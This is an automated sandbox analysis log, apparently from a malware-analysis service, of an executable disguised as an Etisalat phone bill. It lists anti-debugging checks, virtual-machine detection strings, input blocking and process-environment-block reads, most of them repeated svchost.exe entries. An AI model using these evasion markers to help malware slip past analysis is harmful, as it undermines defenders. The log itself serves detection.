Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_00919642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00919642
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_0091979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0091979D
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_00919B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00919B2B
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_00915C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00915C97

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_008A42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_008A42DE

Source: explorer.exe, 00000003.00000000.2040468425.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: Etisalat Summary Bill for the Month of August.exe, 00000000.00000003.2015728806.0000000001314000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: iLKvMcIMaz
Source: explorer.exe, 00000003.00000000.2042336516.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4491886070.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000003.00000003.3095809901.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000003.00000003.3095809901.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: explorer.exe, 00000003.00000002.4492753701.0000000009C96000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.2042336516.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 00000003.00000003.3809508104.0000000003554000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000003.00000002.4492753701.0000000009C96000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000003.00000000.2027472063.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: explorer.exe, 00000003.00000003.3809508104.0000000003554000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000003.00000000.2040468425.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 00000003.00000000.2042336516.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4491886070.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000003.00000003.3809508104.0000000003554000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000003.00000003.3809508104.0000000003554000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
Source: explorer.exe, 00000003.00000003.3095809901.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000003.00000000.2027472063.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000003.00000000.2042336516.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.2040468425.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00409AB0 rdtsc

2_2_00409AB0

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0040ACF0 LdrLoadDll,

2_2_0040ACF0

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_0091EAA2 BlockInput,

0_2_0091EAA2

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_008D2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_008D2622

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_008A42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_008A42DE

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008C4CE8 mov eax, dword ptr fs:[00000030h]	0_2_008C4CE8
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_01F43530 mov eax, dword ptr fs:[00000030h]	0_2_01F43530
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_01F434D0 mov eax, dword ptr fs:[00000030h]	0_2_01F434D0
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_01F41E70 mov eax, dword ptr fs:[00000030h]	0_2_01F41E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]	2_2_03A2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]	2_2_03A2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]	2_2_03A2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]	2_2_03A5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]	2_2_03A5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]	2_2_03A28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]	2_2_03A28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]	2_2_03A28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]	2_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A663FF mov eax, dword ptr fs:[00000030h]	2_2_03A663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEC3CD mov eax, dword ptr fs:[00000030h]	2_2_03AEC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]	2_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]	2_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]	2_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]	2_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB63C0 mov eax, dword ptr fs:[00000030h]	2_2_03AB63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h]	2_2_03ADE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h]	2_2_03ADE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE3DB mov ecx, dword ptr fs:[00000030h]	2_2_03ADE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h]	2_2_03ADE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h]	2_2_03AD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h]	2_2_03AD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B08324 mov eax, dword ptr fs:[00000030h]	2_2_03B08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B08324 mov ecx, dword ptr fs:[00000030h]	2_2_03B08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B08324 mov eax, dword ptr fs:[00000030h]	2_2_03B08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B08324 mov eax, dword ptr fs:[00000030h]	2_2_03B08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]	2_2_03A6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]	2_2_03A6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]	2_2_03A6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2C310 mov ecx, dword ptr fs:[00000030h]	2_2_03A2C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A50310 mov ecx, dword ptr fs:[00000030h]	2_2_03A50310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD437C mov eax, dword ptr fs:[00000030h]	2_2_03AD437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]	2_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]	2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]	2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]	2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB035C mov ecx, dword ptr fs:[00000030h]	2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]	2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]	2_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFA352 mov eax, dword ptr fs:[00000030h]	2_2_03AFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD8350 mov ecx, dword ptr fs:[00000030h]	2_2_03AD8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B0634F mov eax, dword ptr fs:[00000030h]	2_2_03B0634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]	2_2_03A402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]	2_2_03A402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]	2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]	2_2_03A6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]	2_2_03A6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]	2_2_03AB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]	2_2_03AB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]	2_2_03AB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]	2_2_03A402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]	2_2_03A402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]	2_2_03A402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B062D6 mov eax, dword ptr fs:[00000030h]	2_2_03B062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2823B mov eax, dword ptr fs:[00000030h]	2_2_03A2823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]	2_2_03A34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]	2_2_03A34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]	2_2_03A34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2826B mov eax, dword ptr fs:[00000030h]	2_2_03A2826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB8243 mov eax, dword ptr fs:[00000030h]	2_2_03AB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB8243 mov ecx, dword ptr fs:[00000030h]	2_2_03AB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B0625D mov eax, dword ptr fs:[00000030h]	2_2_03B0625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2A250 mov eax, dword ptr fs:[00000030h]	2_2_03A2A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36259 mov eax, dword ptr fs:[00000030h]	2_2_03A36259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEA250 mov eax, dword ptr fs:[00000030h]	2_2_03AEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEA250 mov eax, dword ptr fs:[00000030h]	2_2_03AEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A70185 mov eax, dword ptr fs:[00000030h]	2_2_03A70185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]	2_2_03AEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]	2_2_03AEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h]	2_2_03AD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h]	2_2_03AD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]	2_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]	2_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]	2_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]	2_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]	2_2_03A2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]	2_2_03A2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]	2_2_03A2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B061E5 mov eax, dword ptr fs:[00000030h]	2_2_03B061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A601F8 mov eax, dword ptr fs:[00000030h]	2_2_03A601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]	2_2_03AF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]	2_2_03AF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A60124 mov eax, dword ptr fs:[00000030h]	2_2_03A60124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]	2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]	2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]	2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]	2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]	2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]	2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]	2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]	2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]	2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]	2_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADA118 mov ecx, dword ptr fs:[00000030h]	2_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]	2_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]	2_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]	2_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF0115 mov eax, dword ptr fs:[00000030h]	2_2_03AF0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04164 mov eax, dword ptr fs:[00000030h]	2_2_03B04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04164 mov eax, dword ptr fs:[00000030h]	2_2_03B04164
